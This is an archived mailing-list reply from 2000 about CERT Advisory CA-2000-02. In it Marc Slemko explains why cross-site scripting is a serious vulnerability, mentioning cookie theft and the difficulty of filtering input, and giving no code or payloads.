Re: Fwd: CERT Advisory CA-2000-02

[marcs () ZNEP COM (Marc Slemko)]

-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 3 Feb 2000 Shockro () AOL COM wrote:

> I'm curious as to how this could be used in a malicious manner, as opposed to
> just being an annoyance.  I mean, god forbid, people should execute arbitrary
> javascript on us.  Yes, we've all seen the file upload form exploit and the
> 1001 ways to crash Internet Explorer through infinite loops, but there's
> nothing seriously harmful about this, am I right?  Please correct me if I'm
> wrong.

You are completely wrong.

Please go through the full text of the CERT advisory, and the info
in the Apache and (in particular) Microsoft web sites.

This is a problem because it breaks some of the sites specific barriers.
A very simple example is that this could be used to steal someone's cookie,
which may be what is used to authenticate them.

The problem is a very broad one, however, with a huge number of specific
instances, most of which have probably not been discovered.  It also
goes beyond just javascript, since javascript is not necessary to
exploit this in certain ways.

Again, this is not a javascript problem.  This is also not just the same
old "if user B submits something to a site that is then shown to
user A, you have to filter or encode it" problem.  This is "if user
A submits something to a site that is sent back unfiltered and unencoded
to user A, then you have a security problem".  Yes, this is a new
issue.  Well, the components of it are (mostly) nothing new, but putting
them together is.

Also note that filtering or encoding things is not as easy as you may
think.  There are far too many very annoying things, including characterset
issues and browser specific extensions.

- From my brief survey last week, most of the top commerce sites are
vulnerable to some degree (if it can be exploited to any dangerous effect,
however, is another issue) and most webserver products are vulnerable
themselves; Apache's vulnerabilities are among the less serious compared
to a number of other products.  Even some products where the vendor has
released a statement saying "no problems" have obvious problems.  Don't
start thinking this is just a vendor problem though; the real issue with
this problem is that fixing it requires a site fix all their locally
created dynamic content.

- --
     Marc Slemko     | Apache Software Foundation member
     marcs () znep com  | marc () apache org

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQCVAwUBOJnzNVQv/g4Arev1AQE2VwP+Npc1Aa9tmyb/4KbjyxCFn879h7bCLZkq
WblwHPocOuW1oiS38ejdqf6V4nn4qSUXjzmhwRK8ZsC15v9dVE3ZaEfwh4Rkd6JK
VpgRdbgI6KcTkWI7ceNNWbu4AsE5t3MJ08RQD9bwr+C6MVj6zby3gyNtNbt16Itl
+0hcVca/F8Y=
=78Oq
-----END PGP SIGNATURE-----